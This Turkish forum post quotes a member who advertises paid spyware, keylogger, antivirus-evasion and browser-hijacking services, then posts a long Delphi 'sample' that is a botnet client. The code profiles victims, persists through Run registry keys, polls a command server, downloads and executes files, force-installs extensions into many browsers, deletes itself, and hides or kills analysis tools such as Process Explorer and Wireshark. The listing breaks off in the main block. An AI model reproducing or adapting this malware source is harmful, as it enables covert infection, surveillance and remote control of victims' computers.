tbtlb adlı üyeden alıntı:
mesajı görüntüle
arkadaslar merhaba,
C/C++ Assembler ve Delphi dillerinde Masaüstü ve Mobil uygulamalar geliştiriyorum.
internetten veri çekme, soket tabanli multithreaded client/server uygulamalari, json/xml/text data/video/image/audio işleme, Tarayıcı İşlemleri (Ana Sayfa Değiştirme Programları, Eklenti Kurulumu Yapan Programlar), Undetecting, Spyware, KeyLogger ile ilgili işler yapiyorum..
referanslarim mevcut, PM araciligi ile talep edebilirsiniz.
dogrudan programlama(C/C++/ASM/Delphi/VisualBasic/JavaScript/VBScript/PHP/ASP) egitimi almak isteyenler, ilgilenenler,soru sormak isteyenler ve benimle calismak isteyenler PM atabilir.
kabul ettigim odeme turleri,
paypal, misli.com, nesine.com, garantibankasi, isbankasi
Yazmış Olduğum Örnek Bir Kod Parçacığı...
C/C++ Assembler ve Delphi dillerinde Masaüstü ve Mobil uygulamalar geliştiriyorum.
internetten veri çekme, soket tabanli multithreaded client/server uygulamalari, json/xml/text data/video/image/audio işleme, Tarayıcı İşlemleri (Ana Sayfa Değiştirme Programları, Eklenti Kurulumu Yapan Programlar), Undetecting, Spyware, KeyLogger ile ilgili işler yapiyorum..
referanslarim mevcut, PM araciligi ile talep edebilirsiniz.
dogrudan programlama(C/C++/ASM/Delphi/VisualBasic/JavaScript/VBScript/PHP/ASP) egitimi almak isteyenler, ilgilenenler,soru sormak isteyenler ve benimle calismak isteyenler PM atabilir.
kabul ettigim odeme turleri,
paypal, misli.com, nesine.com, garantibankasi, isbankasi
Yazmış Olduğum Örnek Bir Kod Parçacığı...
program Join;
//{$DEFINE DEBUG_MODE_ON} // Hata Duzeltmeleri İcin; bu satiri kapatirsan siyah ekran gider.
//{$DEFINE DEMO_VERSION}
{$IFDEF DEBUG_MODE_ON}
{$APPTYPE CONSOLE} // Siyah Ekran Gozukmesi Icin Gereklidir.
{$ELSE}
{$APPTYPE GUI} // Siyah Ekrani Gizlemek İcin;
{$ENDIF}
{$IFDEF DEBUG_MODE_ON}
{$E .dll}
{$ELSE}
{$E .dll}
{$ENDIF}
{$WARNINGS OFF}
{$HINTS OFF}
{$R Generator.RES}
{
[+] Eklenen Ozellik[*] Duzeltilen Sorun
[-] Cikarilan Ozellik
[#] Gelistirilen Ozellik
Guncelleme - 30.07.2014
+ Dosya İle Birleştirme Özelliği Eklendi.
+ Registry Key ve Installation Name değiştirebilme Özelliği Eklendi.
+ Builder Özelliği Eklendi
+ Simge Değiştirebilme Özelliği Eklendi.
+ UPX ike Sıkıştırma Özelliği Eklendi.
Guncelleme - 15.07.2014
+ CloudFlare Destegi Eklendi.
* CloudFlare gibi protected sunuculardan dosya cekim isleminde hata verip programin kirilmasina sebep olan problem duzeltildi.
+ User-Agent Eklendi
+ Redirection Eklendi
+ WireShark Anti Debugger Bypass Ozelligi Eklendi
* Programin hata vermesine sebebiyet veren (SaveToFile) Free edilemeyen MemoryStream sorunu duzeltildi.
* SaveToFile Fonksiyonu WinAPI kullanilarak improve edildi.
+ Demo Version Destegi Eklendi.
Eklenenler - 01.07.2014
+ Chrome görev yöneticisi ekranını otomatik kapatabilme özelliği eklendi.
* Paneldeki Sorun Düzeltildi.
* Programin komut almamasına sebep olan problem düzeltildi.
* Uygulama installation dizini tekrar düzeltildi.
# Bazı fonksiyonlar geliştirildi. Bilgisayar bilgisi alan fonksiyon düzenlendi.
Guncelleme - 03.07.2014
* Process Sonlandirmadaki Yetkilendirme Problemi Duzeltildi.
* Installation Islemi Threadindaki Olusan Hata Duzeltildi.
- Taskkill /im /f process* fonksiyonu programdan cikarildi.
}
uses
Windows,
IdHTTP,
Classes,
IniFiles,
shFolder,
Math,
ShellAPI,
TlHelp32,
ImageHlp,
ShlObj,
SysUtils,
uRC4 in 'uRC4.pas',
uPrefs in 'uPrefs.pas';
const
CMD_CLOSESERVER = 1000;
CMD_UNINSTALLFILE = 1001;
CMD_UPDATESERVER = 1002;
CMD_INSTALLEXTENSION = 1003;
CMD_RESETBROWSERS = 1004;
CMD_DOWNLOADANDEXECUTE = 1005;
const
NONE = $00; //Blank number
INET_USERAGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0';
INET_REDIRECT_MAX = 10;
Type
TCustomDownloadFile = record
SavePath : string;
end;
TBotConfig = record
Mutex : String;
VictimName : string;
VictimComputerName : string;
VictimCountry : string;
VictimLanguage : string;
VictimOS : string;
VictimVersion : string;
SettingsFile : string;
SettingsIniFile : TIniFile;
ProductKey : string;
CommandURL : string;
InstallDirectory,
InstallName,
InstallDirectoryPath,
RegistryName : string;
End;
TInfo = RECORD
URL_ADDR : ARRAY [0..255] OF CHAR;
BINDER : BOOL;
FILE_NAME : ARRAY [0..255] OF CHAR;
// BROWSER
FIREFOX : BOOL;
OPERA : BOOL;
CHROME : BOOL;
EXPLORER : BOOL;
SAFARI : BOOL;
PALEMON : BOOL;
MAXTHON : BOOL;
KMELEON : BOOL;
DRAGON : BOOL;
AVANT : BOOL;
YANDEX : BOOL;
TORCH : BOOL;
IRON : BOOL;
CHROMIUM : BOOL;
SUPERBIRD : BOOL;
CHROMECANARY : BOOL;
//OTHER
MELT : BOOL;
PERSISTANCE : BOOL;
ENCRYPT : BOOL;
INSTALL : BOOL;
//REGISTRY
KEY : ARRAY [0..255] OF CHAR;
PROGRAMNAME : ARRAY [0..255] OF CHAR;
END;
TBrowser = record
// Tarayici Bilgileri;
Firefox_Path,
Firefox_Config,
Firefox_Ext,
Chrome_Path,
Chrome_Config,
Chrome_Ext,
Yandex_Path,
Yandex_Config,
Yandex_Ext,
ComodoDragon_Path,
ComodoDragon_Config,
ComodoDragon_Ext,
Torch_Path,
Torch_Config,
Torch_Ext,
Maxthon_Path,
Maxthon_Config,
Maxthon_Ext,
Iron_Path,
Iron_Config,
Iron_Ext,
Chromium_Path,
Chromium_Config,
Chromium_Ext,
SuperBird_Path,
SuperBird_Config,
SuperBird_Ext,
ChromeCanary_Path,
ChromeCanary_Config,
ChromeCanary_Ext,
Opera_Path,
Opera_Config,
Opera_Ext : string;
// Yuklenmis mi?
Firefox_Installed,
Chrome_Installed,
Yandex_Installed,
ComodoDragon_Installed,
Torch_Installed,
Maxthon_Installed,
Iron_Installed,
SuperBird_Installed,
ChromeCanary_Installed,
Chromium_Installed,
Opera_Installed : Boolean;
End;
Const
Parser : String = '~';
CurrentVersion : string = '0.9.9.2';
StartUpPath : string = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\';
var
BotConfig : TBotConfig;
INFO : TInfo;
Procedure DemoVersion;
begin
{$IFDEF DEMO_VERSION}
MessageBox(0,'DEVAM_ICIN_ILERI_BAS','DEMO_VERSION',MB_OK OR MB_ICONINFORMATION);
{$ENDIF}
end;
Procedure DebugPrompt(pszData : string);
begin
//OutputDebugStringW(PWideChar(WideString(pszData)));
//Writeln(pszData);
//Writeln(pszData);
{$IFDEF DEBUG_MODE_ON}
Writeln(pszData)
{$ENDIF}
end;
function KillTask(ExeFileName: string): Integer;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
Result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while Integer(ContinueLoop) <> 0
do begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(
OpenProcess(PROCESS_TERMINATE,
BOOL(0),
FProcessEntry32.th32ProcessID),
0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure DetectChromeTaskManager;
var
guiInfo : TGUIThreadInfo;
WindowName : string;
arrWindow : array[0..255] of char;
begin
while True Do
begin
guiInfo.cbsize := sizeof(TGUIThreadInfo);
GetGUIThreadInfo(0,guiInfo);
ZeroMemory(@arrWindow,SizeOf(arrWindow));
GetWindowText(guiInfo.hwndActive,arrWindow,sizeof(arrWindow));
WindowName := trim(string(arrWindow));
if (
(WindowName = 'Görev Yöneticisi - Google Chrome') or
(WindowName = 'Task Manager - Google Chrome') or
(WindowName = 'Task Manager - Comodo Dragon') or
(WindowName = 'Görev Yöneticisi - Comodo Dragon') or
(WindowName = 'Yandex görev yöneticisi') or
(WindowName = 'Task Manager Yandex') or
(WindowName = 'Task Manager - Iron') or
(WindowName = 'Görev Yöneticisi - Iron') or
(WindowName = 'Task Manager - Superbird') or
(WindowName = 'Görev Yöneticisi - Superbird') or
(WindowName = 'Görev Yöneticisi - Torch') or
(WindowName = 'Task Manager - Torch')
)
then begin
DebugPrompt(WindowName + ' Tespit Edildi ve KAPANDI');
CloseWindow(guiInfo.hwndActive);
end
else if (WindowName = 'Fiddler Web Debugger') or // Kill Debuggers;
(Pos('rocess Explorer',WindowName)>0) or
(Pos('rocess Hacker',WindowName)>0)
then begin
EnableWindow(guiInfo.hwndActive,false);
ShowWindow(guiInfo.hwndActive,SW_HIDE);
end
else if (Pos('Wireshark',WindowName)>0)
then begin
KillTask('Wireshark.exe');
end;
Sleep(1000);
end;
end;
procedure Str2File(sData,sPath: string);
var
hFile: THandle;
dWritten: DWORD;
begin
DebugPrompt('KAYIT YERI : ' + sPath);
hFile := CreateFile(PChar(sPath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if hFile <> 0
then begin
SetFilePointer(hFile, 0, nil, FILE_BEGIN);
WriteFile(hFile, sData[1], Length(sData), dWritten, nil);
end;
CloseHandle(hFile);
DebugPrompt('KAYIT EDILDI!');
end;
Function AddToRegistry(RegKey : HKey;dType : Cardinal;SubKey,SingleKey,Value : String) : Boolean;
VAR
Key : HKey;
Begin
Result := False;
if RegOpenKeyEx(RegKey,PChar(SubKey), 0, KEY_WRITE, Key) = ERROR_SUCCESS
then begin
RegSetValueEx(Key, PAnsiChar(SingleKey), 0,dType, PChar(Value),Length(Value)); // The 1 is for the terminating 0 (PChar)
RegCloseKey(Key);
RegCloseKey(RegKey);
end;
End;
function Url2File(data : string) : string;
begin
Result := StringReplace(data,'/','\',[rfReplaceAll]);
end;
function GetCustomPath(PathIndex : Integer) : string;
var
arrPath : array[0..255] of char;
begin
ZeroMemory(@arrPath,SizeOf(arrPath));
case PathIndex of
5 : begin GetTempPath(SizeOf(arrPath),@arrPath); end; // TEMP
6 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_APPDATA,false); end; // App DATA
7 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_LOCAL_APPDATA,false); end; // Local App DATA
end;
result := IncludeTrailingBackSlash(Trim(string(arrPath)));
end;
function GenerateRandomText(iLen : Integer): string;
var
i : Integer;
begin
Randomize;
Result := '';
for i := 0 to iLen
do begin
Result := Result + Chr( RandomRange(65,90) );
end;
end;
function GetUserInfo(Index : Integer) : String;
var
arrData : array [0..255] of char;
hSize : Cardinal;
begin
ZeroMemory(@arrData,SizeOf(arrData));
hSize := SizeOf(arrData);
FillChar(arrData,SizeOf(arrData),#0);
case Index of
0 : begin GetComputerName(arrData,hSize); end; // computername
1 : begin GetUserName(arrData,hSize); end; // username
2 : begin // country Info
Windows.GetLocaleInfo(LOCALE_USER_DEFAULT,LOCALE_SISO3166CTRYNAME,arrData,SizeOf(arrData))
end;
3 : begin // language
VerLanguageName(GetSystemDefaultLCID,arrData,SizeOf(arrData));
end;
end;
Result := string(Trim(string(arrData)));
Result := StringReplace(Result,' ','_',[rfReplaceAll]);
Result := StringReplace(Result,'.','_',[rfReplaceAll]);
Result := StringReplace(Result,',','_',[rfReplaceAll]);
Result := StringReplace(Result,'~','_',[rfReplaceAll]);
Result := StringReplace(Result,'$','_',[rfReplaceAll]);
Result := StringReplace(Result,'#','_',[rfReplaceAll]);
Result := StringReplace(Result,'*','_',[rfReplaceAll]);
Result := StringReplace(Result,'{','_',[rfReplaceAll]);
Result := StringReplace(Result,'}','_',[rfReplaceAll]);
Result := StringReplace(Result,'[','_',[rfReplaceAll]);
Result := StringReplace(Result,']','_',[rfReplaceAll]);
Result := StringReplace(Result,'(','_',[rfReplaceAll]);
Result := StringReplace(Result,')','_',[rfReplaceAll]);
Result := StringReplace(Result,'+','_',[rfReplaceAll]);
Result := StringReplace(Result,'%','_',[rfReplaceAll]);
Result := StringReplace(Result,'<','_',[rfReplaceAll]);
Result := StringReplace(Result,'>','_',[rfReplaceAll]);
Result := StringReplace(Result,'|','_',[rfReplaceAll]);
Result := StringReplace(Result,'?','_',[rfReplaceAll]);
Result := StringReplace(Result,'-','_',[rfReplaceAll]);
if Length(Result) = 0 then Result := 'Unknown';
DebugPrompt('Info:'+IntToStr(Index)+ '---' +Result);
end;
function InternetDownloadFile(pszUrl : string;Execute: Boolean;HasParams : String):TCustomDownloadFile;
var
hDownloadSocket : TIdHTTP;
stream : TMemoryStream;
begin
Result.SavePath := GetCustomPath(5) + ExtractFileName(Url2File(pszUrl));
If FileExists(Result.SavePath)
then begin
DeleteFileW(PWideChar(WideString(Result.SavePath)));
end;
DebugPrompt('URL ADRESİ : ' + pszUrl);
stream := TMemoryStream.Create;
hDownloadSocket := TIdHTTP.Create(nil);
hDownloadSocket.request.userAgent := INET_USERAGENT;
hDownloadSocket.redirectMaximum := INET_REDIRECT_MAX;
hDownloadSocket.handleRedirects := INET_REDIRECT_MAX<>NONE;
DebugPrompt('URL Adresi : ' + pszUrl);
hDownloadSocket.Get(pszUrl,Stream);
Stream.position := 0 ;
If not FileExists(Result.SavePath)
then begin
Stream.SaveToFile(Result.SavePath);
Stream.Free;
end;
if Execute = true
then begin
DebugPrompt(Result.SavePath);
ShellExecuteA(0,'OPEN',PAnsiChar(Result.SavePath),PAnsiChar(HasParams),Nil,SW_SHOW);
end;
end;
Procedure Melt(OldFile :String);
var
BatData : String;
BatFile : String;
Begin
BatData :=':start'+#13#10+
'ping -n 1 localhost'+#13#10+
'del' + ' "' + OldFile + '"'+#13#10+
'if exist' + ' "' + OldFile + '" ' + 'goto start'+ #13#10+
'del %0';
BatFile:=IncludeTrailingBackSlash(GetCustomPath(5)) + 'Sil.bat';
Str2File(BatData,BatFile);
ShellExecuteA(0, 'open', PAnsiChar(BatFile), nil, nil, SW_HIDE);
End;
procedure Uninstall;
begin
AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,'');
AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,'');
Melt(ParamStr(0));
ExitProcess(0);
end;
function StringToUnicode(sString:String):String;
var
i:integer;
begin
Result := '';
for i := 1 to Length(sString) do begin
Result := Result + sString[i] + #0;
end;
end;
procedure InstallFile;
var
pCurPath:Pointer;
strPath : String;
ServerMutex : THandle;
begin
AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath);
AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath);
strPath := BotConfig.InstallDirectoryPath;
strPath := StringToUnicode(strPath);
if lstrlenW(@strPath[1]) <> 0
then begin
GetMem(pCurPath,(MAX_PATH * 4));
if pCurPath <> nil
then begin
GetModuleFileNameW(0,pCurPath,(MAX_PATH * 4));
if lstrcmpiW(pCurPath,@strPath[1]) <> 0
then begin
if CopyFileW(pCurPath,@strPath[1],False)
then begin
if ShellExecuteW(0,nil,@strPath[1],nil,nil,SW_SHOW) >= 32
then begin
ExitProcess(0);
end;
end;
end;
FreeMem(pCurPath);
end;
end;
ServerMutex := CreateMutex(nil,False,pchar(String(BotConfig.Mutex)));
if GetLastError = ERROR_ALREADY_EXISTS
then begin
CloseHandle(ServerMutex);
ExitProcess(0);
end;
end;
procedure OpenBrowser;
begin
if ShellExecuteW(0,nil,'Chrome.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Chrome Calisti');
end
else if ShellExecuteW(0,nil,'Firefox.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('FireFox Calisti');
end
else if ShellExecuteW(0,nil,'Browser.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Yandex Calisti');
end
else if ShellExecuteW(0,nil,'Opera.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Opera Calisti');
end
else if ShellExecuteW(0,nil,'Dragon.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Comodo Dragon Calisti');
end
else if ShellExecuteW(0,nil,'iexplore.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Internet Explorer Calisti');
end
else begin
ShellExecuteA(0,'OPEN',PAnsiChar('http://facebook.com'),'',Nil,SW_SHOW);
end;
end;
procedure ResetBrowsers;
var
strBrowserList : TStringList;
i : Integer;
begin
strBrowserList := TStringList.Create;
strBrowserList.Clear;
// Tarayicilari Kapat
with strBrowserList
do begin
Add('firefox.exe');
Add('chrome.exe');
Add('yandex.exe');
Add('iexplore.exe');
Add('browser.exe');
Add('dragon.exe');
Add('opera.exe');
Add('iron.exe');
Add('superbird.exe');
Add('torch.exe');
end;
for i := 0 to strBrowserList.Count - 1
do begin
DebugPrompt('Oldurulen Tarayici : ' + strBrowserList.Strings[i]);
KillTask(strBrowserList.Strings[i]);
end;
end;
function CheckExtensionIsInstalled(Url,Path : String) : Boolean;
begin
Result := False;
if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastExtension','')<>Url
then begin
BotConfig.SettingsIniFile.WriteString('SETTINGS','LastExtension',Url);
Result := False;
end
else
begin
DebugPrompt('Bu Eklenti Zaten Yüklenmiştir...');
Result := True;
end;
end;
procedure InstallExtension(pszData : string);
var
Key,Value,ExtensionURL : string;
Browser : TBrowser;
ExtName : string;
begin
// Eklenti Kur
ExtensionURL := Copy(pszData,1,Pos(Parser,pszData)-1);
Delete(pszData,1,Length(ExtensionURL)+1);
Key := Copy(pszData,1,Pos(Parser,pszData)-1);
Delete(pszData,1,Length(Key)+1);
Value := Copy(pszData,1,Pos(Parser,pszData)-1);
if CheckExtensionIsInstalled(ExtensionURL,Browser.Chrome_Ext + ExtName) = True
then begin
Exit;
end;
DebugPrompt('ExtensionURL:'+ExtensionURL);
DebugPrompt('Key:'+Key);
DebugPrompt('Value:'+Value);
Browser.Chrome_Path := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Extensions\';
Browser.Chrome_Config := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chrome_Path)));
Browser.Chrome_Installed := FileExists(Browser.Chrome_Config);
Browser.Chrome_Ext := IncludeTrailingBackSlash(Browser.Chrome_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Chrome_Ext));
DebugPrompt(Browser.Chrome_Ext);
Browser.Yandex_Path := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Extensions\';
Browser.Yandex_Config := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Yandex_Path)));
Browser.Yandex_Installed := FileExists(Browser.Yandex_Config);
Browser.Yandex_Ext := IncludeTrailingBackSlash(Browser.Yandex_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Yandex_Ext));
DebugPrompt(Browser.Yandex_Ext);
Browser.ComodoDragon_Path := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Extensions\';
Browser.ComodoDragon_Config := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ComodoDragon_Path)));
Browser.ComodoDragon_Installed := FileExists(Browser.ComodoDragon_Config);
Browser.ComodoDragon_Ext := IncludeTrailingBackSlash(Browser.ComodoDragon_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.ComodoDragon_Ext));
DebugPrompt(Browser.ComodoDragon_Ext);
Browser.ChromeCanary_Path := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Extensions\';
Browser.ChromeCanary_Config := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ChromeCanary_Path)));
Browser.ChromeCanary_Installed := FileExists(Browser.ChromeCanary_Config);
Browser.ChromeCanary_Ext := IncludeTrailingBackSlash(Browser.ChromeCanary_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.ChromeCanary_Ext));
DebugPrompt(Browser.ChromeCanary_Ext);
Browser.Chromium_Path := GetCustomPath(7) + 'Chromium\User Data\Default\Extensions\';
Browser.Chromium_Config := GetCustomPath(7) + 'Chromium\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chromium_Path)));
Browser.Chromium_Installed := FileExists(Browser.Chromium_Config);
Browser.Chromium_Ext := IncludeTrailingBackSlash(Browser.Chromium_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Chromium_Ext));
DebugPrompt(Browser.Chromium_Ext);
Browser.Torch_Path := GetCustomPath(7) + 'Torch\User Data\Default\Extensions\';
Browser.Torch_Config := GetCustomPath(7) + 'Torch\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Torch_Path)));
Browser.Torch_Installed := FileExists(Browser.Torch_Config);
Browser.Torch_Ext := IncludeTrailingBackSlash(Browser.Torch_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Torch_Ext));
DebugPrompt(Browser.Torch_Ext);
Browser.SuperBird_Path := GetCustomPath(7) + 'SuperBird\User Data\Default\Extensions\';
Browser.SuperBird_Config := GetCustomPath(7) + 'SuperBird\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.SuperBird_Path)));
Browser.SuperBird_Installed := FileExists(Browser.SuperBird_Config);
Browser.SuperBird_Ext := IncludeTrailingBackSlash(Browser.SuperBird_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.SuperBird_Ext));
DebugPrompt(Browser.SuperBird_Ext);
Browser.Opera_Path := GetCustomPath(6) + 'Opera Software\Opera Stable\Extensions\';
Browser.Opera_Config := GetCustomPath(6) + 'Opera Software\Opera Stable\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Opera_Path)));
Browser.Opera_Installed := FileExists(Browser.Opera_Config);
Browser.Opera_Ext := IncludeTrailingBackSlash(Browser.Opera_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Opera_Ext));
DebugPrompt(Browser.Opera_Ext);
with InternetDownloadFile(ExtensionURL,false,'')
do begin
ExtName := ExtractFileName(SavePath);
DebugPrompt(#13#10#13#10);
DebugPrompt('YAZILACAK YER : ' + Browser.Chrome_Ext + ExtName);
DebugPrompt('NEREDEN : ' + SavePath);
DebugPrompt('Browserlar Resetleniyor..');
ResetBrowsers;
DebugPrompt('Browserlar Resetlendi.');
Sleep(5000);
DebugPrompt('Chrome_Ext : ' + Browser.Chrome_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chrome_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Chrome_Ext + ExtName), Browser.Chrome_Config);
DebugPrompt('Yandex_Ext : ' + Browser.Yandex_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Yandex_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Yandex_Ext + ExtName), Browser.Yandex_Config);
DebugPrompt('ComodoDragon_Ext : ' + Browser.ComodoDragon_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ComodoDragon_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.ComodoDragon_Ext + ExtName), Browser.ComodoDragon_Config);
DebugPrompt('Torch_Ext : ' + Browser.Torch_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Torch_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Torch_Ext + ExtName), Browser.Torch_Config);
DebugPrompt('Opera_Ext : ' + Browser.Opera_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Opera_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Opera_Ext + ExtName), Browser.Opera_Config);
DebugPrompt('ChromeCanary_Ext : ' + Browser.ChromeCanary_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ChromeCanary_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.ChromeCanary_Ext + ExtName), Browser.ChromeCanary_Config);
DebugPrompt('Chromium_Ext : ' + Browser.Chromium_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chromium_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.Chromium_Ext + ExtName), Browser.Chromium_Config);
DebugPrompt('SuperBird_Ext : ' + Browser.SuperBird_Ext + ExtName);
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.SuperBird_Ext + ExtName),False);
Str2File(GenerateChromePreferences(Value,Key,Browser.SuperBird_Ext + ExtName), Browser.SuperBird_Config);
DebugPrompt('Tarayici Calistiriliyor..');
OpenBrowser;
DebugPrompt('Tarayici Calistirildi.');
Exit;
end;
end;
procedure UpdateServer(pszNewFile : string);
begin
// Server Guncelle
with InternetDownloadFile(pszNewFile,True,'')
do begin
ExitProcess(0);
end;
end;
procedure CheckCommands(Data : string);
var
CommandID : Integer;
Params : String;
IsCommandApplied : Boolean;
begin
Data := Trim(Data);
Delete(Data,1,Pos(':',Data));
IsCommandApplied := False;
if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastCommandHash','')<>Data
then begin
BotConfig.SettingsIniFile.WriteString('SETTINGS','LastCommandHash',Data);
IsCommandApplied := True;
end;
if IsCommandApplied = false
then begin
DebugPrompt('Bu Komut Daha Önceden Zaten Uygulanmış');
Exit;
end;
Data := HexToStr(Trim(Data));
CommandID := StrToIntDef(Copy(Data,1,Pos(Parser,Data)-1),0);
Delete(Data,1,Length(IntToStr(CommandID))+1);
case CommandID of
CMD_CLOSESERVER :
begin
ExitProcess(0);
end;
CMD_UNINSTALLFILE :
begin
Uninstall;
end;
CMD_UPDATESERVER :
begin
DebugPrompt(Data);
UpdateServer(Data);
end;
CMD_RESETBROWSERS :
begin
ResetBrowsers;
OpenBrowser;
end;
CMD_INSTALLEXTENSION :
begin
InstallExtension(Data);
end;
CMD_DOWNLOADANDEXECUTE :
begin
InternetDownloadFile(Data,True,'');
end;
end;
end;
function Decrypt(St: string): string;
var
i: integer;
a: byte;
begin
Result := '';
for i := length(St) downto 1 do begin
A := ord(St[i]);
result := result + char(a+1);
end;
end;
procedure ReadCommands;
var
Socket: TIdHTTP;
lstParams : TStringList;
strResponse : string;
begin
lstParams := TStringList.Create;
lstParams.Clear;
lstParams.add('vKey='+BotConfig.ProductKey);
lstParams.add('uID='+BotConfig.VictimName);
lstParams.add('cID='+BotConfig.VictimComputerName);
lstParams.add('vCountry='+BotConfig.VictimCountry);
lstParams.add('vLang='+BotConfig.VictimLanguage);
lstParams.add('vVer='+BotConfig.VictimVersion);
lstParams.add('vOS='+BotConfig.VictimOS);
while True
do begin
try
Socket:= TIdHTTP.Create(nil);
Socket.request.userAgent:= INET_USERAGENT;
Socket.redirectMaximum := INET_REDIRECT_MAX;
Socket.handleRedirects := INET_REDIRECT_MAX<>NONE;
Socket.Port := 80;
strResponse := Socket.Post(BotConfig.CommandURL,lstParams);
except on e : Exception
do begin
DebugPrompt(E.Message);
end;
end;
DebugPrompt('KOMUT OKUNDU:'+strResponse);
CheckCommands(strResponse);
strResponse:='';
Sleep(10000);
end;
end;
var
Msg : TMSG;
ServerMutex,
threadTaskManager,
threadChromeTaskManagerControl,
threadReadCommands,
threadInstallServer : THandle;
ResData : String;
ResourceStream : TResourceStream;
Stream : TMemoryStream;
FileData : String;
BindFilePath : String;
threadTaskManagerId,
threadInstallServerId,
lpReadCommandThreadId : cardinal;
begin
DemoVersion;
SetErrorMode(SEM_FAILCRITICALERRORS +
SEM_NOALIGNMENTFAULTEXCEPT +
SEM_NOGPFAULTERRORBOX +
SEM_NOOPENFILEERRORBOX);
DemoVersion;
ResData:='';
ResourceStream:=TResourceStream.Create(0,'TKEY',RT_RCDATA);
ResourceStream.Position:=0;
SetString(ResData,pansichar(ResourceStream.Memory),ResourceStream.Size);
ResData := Decrypt(ResData);
DebugPrompt('DECRYPTED RES DATA : ' + ResData);
Stream := TMemoryStream.Create;
Stream.Write(pointer(ResData)^,Length(ResData));
Stream.Position := 0;
Stream.Read(Info,SizeOf(TInfo));
FileData:='';
try
ResourceStream:=TResourceStream.Create(0,'TFILE',RT_RCDATA);
SetString(FileData,pansichar(ResourceStream.Memory),ResourceStream.Size);
except on e : Exception do
begin
OutputDebugStringA(PAnsiChar(e.Message));
end;
end;
FileData := Decrypt(FileData);
BotConfig.ProductKey := 'DENEMETEST';
BotConfig.Mutex := 'DENEMETESTv10';
BotConfig.VictimName := GetUserInfo(1);
BotConfig.VictimComputerName := GetUserInfo(0);
BotConfig.VictimCountry := GetUserInfo(2);
BotConfig.VictimLanguage := GetUserInfo(3);
BotConfig.InstallName := String(INFO.PROGRAMNAME);
BotConfig.RegistryName := String(INFO.KEY);
